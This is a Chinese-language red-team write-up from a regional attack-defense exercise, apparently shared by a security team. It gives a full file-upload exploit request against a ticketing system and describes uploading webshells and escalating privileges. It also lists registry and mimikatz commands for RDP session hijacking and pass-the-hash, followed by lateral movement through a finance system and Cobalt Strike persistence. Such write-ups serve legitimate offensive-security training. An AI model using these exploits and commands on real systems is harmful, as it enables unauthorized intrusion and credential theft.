0x01 背景

参加了某次地市攻防演练，限制目标单位但不限目标系统，只要能够证明属于攻击单位目标资产的系统均可计分。主要规则：一、获取权限（攻击路径）：得分上限的对象是单个防守单位及其所有下属机构。根据不同系统不同权限给分二、突破网络边界：整个目标单位突破同一类网络边界只给一次分。三、获取目标系统权：互联网、业务内网、核心生产网。四、数据分，不再一一介绍

0x02 获取服务器权限

通过信息收集获取目标单位备案IP

hunter和夸克等资产引擎上可利用的信息有但不多。

全端口扫描发现某票务系统

根据已知poc，通过文件上传漏洞获取服务器webshell

POST /SystemManager/Comm/CommFunHandler.ashx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=--------------------------354575237365372692397370
Content-Length: 873

----------------------------354575237365372692397370
Content-Disposition: form-data; name="file"; filename="1.txt"

<%Response.Write("this is test")
%>
----------------------------354575237365372692397370
Content-Disposition: form-data; name="fileName"

1.asp
----------------------------354575237365372692397370
Content-Disposition: form-data; name="Method"

UploadZoneImg
----------------------------354575237365372692397370
Content-Disposition: form-data; name="solutionNo"

----------------------------354575237365372692397370
Content-Disposition: form-data; name="siteNo"

1
----------------------------354575237365372692397370
Content-Disposition: form-data; name="showNo"

1
----------------------------354575237365372692397370
Content-Disposition: form-data; name="showingNo"

1
----------------------------354575237365372692397370--

但是获取asp webshell后发现存在许多问题。目前已知：

1、上传后的asp马权限低，无法在其他web目录上传文件，也无法使用冰蝎、哥斯拉等工具的代理转发功能。 

2、另外经过不断的测试，发现当前服务器利用这个poc只能传asp，aspx、ashx等格式文件均跳转，猜测已经做过一定的防护。

 3、reg、suo5等脚本均不执行。目前来看，除了想办法提权也没想到其他好方法，但提权后机器不出网，以高权限写入其他格式文件依旧不执行。在想办法如何进行下一步的时候，burp插件提示网站存在ueditor，决定利用这个上传点试一下。（（后期复盘发现并非所有采用该CMS的网站都存在ueditor路径，有些访问是404，实际测试的时候可以访问试一下）

经过测试发现可上传asmx格式的webshell（此截图为webshell管理工具的缓存会话）

使用tscanplus中的提权辅助工具获取可利用的提权漏洞信息,提权并添加系统管理员权限账号密码

查询3389服务状态和端口

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

使用HTTP代理功能，监听18888端口，以新添加大的管理员权限的账户访问被控服务器

2012R2版本系统，考虑RDP劫持服务器管理员桌面

privilege::debug #提权 
ts::sessions #查看当前主机的会话
token::elevate #提升本地管理员权限为system 
ts::remote /id:2 #劫持id为2的会话

或者

privilege::debug 
sekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 "/run:mstsc.exe /restrictedadmin"

（本地虚拟机复现）

0x03 内网横向

虽然当前获取了一台服务器权限，但只以当前转发HTTP流量的方式还是比较脆弱，最好多找几台内网的出网机器上线CS或者直接挂frp。tscan扫描内网发现一台部署了用友财务系统的机器importhttpscer接口处存在任意文件上传漏洞且可以正常出网，获取webshell后直接上线cs

上线后找个进程注入payload，简单做一下权限维持（截图仅为记录思路，实际测试可以多找几台）

有了跳板机，做了权限维持后，普通内网，接下来就是用tscan收集信息横向即可。

团队自研平台：潮汐在线指纹识别平台 | 潮听漏洞情报平台 | 潮巡资产管理与威胁监测平台 | 潮汐网络空间资产测绘 | 潮声漏洞检测平台 | 在线免杀平台 | CTF练习平台 | 物联网固件检测平台 | SRC资产监控平台  | ......

技术分享方向:Web安全 | 红蓝对抗 | 移动安全 | 应急响应 | 工控安全 | 物联网安全 | 密码学 | 人工智能 | ctf 等方面的沟通及分享

团队知识wiki：红蓝对抗 | 漏洞武器库 | 远控免杀 | 移动安全 | 物联网安全 | 代码审计 | CTF | 工控安全 | 应急响应 | 人工智能 | 密码学 | CobaltStrike | 安全测试用例 | ......

团队网盘资料：安全法律法规 | 安全认证资料 | 代码审计 | 渗透安全工具 | 工控安全工具 | 移动安全工具 | 物联网安全 | 其它安全文库合辑  | ......